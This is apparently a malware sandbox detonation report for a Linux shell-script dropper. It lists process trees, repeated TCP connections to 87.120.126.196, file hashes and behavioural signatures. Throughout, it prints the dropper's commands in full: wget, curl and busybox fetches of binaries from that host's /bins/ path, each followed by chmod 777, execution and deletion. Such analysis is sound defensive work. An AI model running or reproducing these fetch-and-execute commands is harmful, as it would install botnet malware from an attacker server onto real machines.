[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 02:34

Reported

2024-10-28 02:36

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

18s

Max time network

128s

Command Line

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A

Processes

/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

